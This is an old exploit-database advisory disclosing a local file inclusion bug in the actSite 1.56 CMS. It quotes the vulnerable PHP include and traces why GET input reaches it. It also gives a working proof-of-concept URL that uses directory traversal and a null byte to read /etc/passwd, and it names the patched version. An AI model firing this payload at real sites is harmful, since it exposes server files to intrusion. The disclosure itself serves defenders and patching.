actSite 1.56 - 'news.php' Local File Inclusion

EDB-ID:

4472


Author:

DNX

Type:

webapps


Platform:

PHP

Date:

2007-10-01


                         \#'#/

                         (-.-)

   -----------------oOO---(_)---OOo-----------------

   | actSite v1.56 (news.php) Local File Inclusion |

   |                 coded by DNX                  |

   -------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



         require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC: 

    - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

    - So why we can inject code in a post variable per url? Let's do some research...

      - In phpinc/news.php line 36

      	require_once('../config.php');



      - Let's take a look in 'config.php' line 22

        if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");



      - Ok, let's take a look in 'phpinc/inc/csb.php' line 18

        if(getenv('REQUEST_METHOD') == "GET") {

		foreach($_GET as $key => $val) {

			 $_POST[$key] =& $_GET[$key];

		}

	}



[!] Solution: Install security update to v1.57

# milw0rm.com [2007-10-01]